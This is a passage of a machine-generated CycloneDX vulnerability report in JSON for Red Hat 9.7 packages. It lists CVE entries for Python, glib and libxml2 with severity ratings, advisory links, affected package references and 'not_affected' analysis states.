          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0672",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. The patch rejects all control characters within cookie names, values, and parameters.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0672"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0672"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/62700107418eb2cca3fc88da036a243ea975f172"
        },
        {
          "url": "https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440"
        },
        {
          "url": "https://github.com/python/cpython/commit/7852d72b653fea0199acf5fc2a84f6f8b84eba8d"
        },
        {
          "url": "https://github.com/python/cpython/commit/918387e4912d12ffc166c8f2a38df92b6ec756ca"
        },
        {
          "url": "https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1869ff648bbee0717221d09e6deff46617f3e85"
        },
        {
          "url": "https://github.com/python/cpython/issues/143919"
        },
        {
          "url": "https://github.com/python/cpython/pull/143920"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0672.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0672"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0672"
        }
      ],
      "published": "2026-01-20T22:15:52+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0988",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0988"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7461"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0988"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429886"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0988"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7971-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0988"
        }
      ],
      "published": "2026-01-21T12:15:55+00:00",
      "updated": "2026-04-24T21:16:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.68.4-18.el9_7.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0989",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0989"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429933"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/998"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0989"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-04-22T10:16:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0990",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0990"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0990"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429959"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1018"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0990"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-04-22T10:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
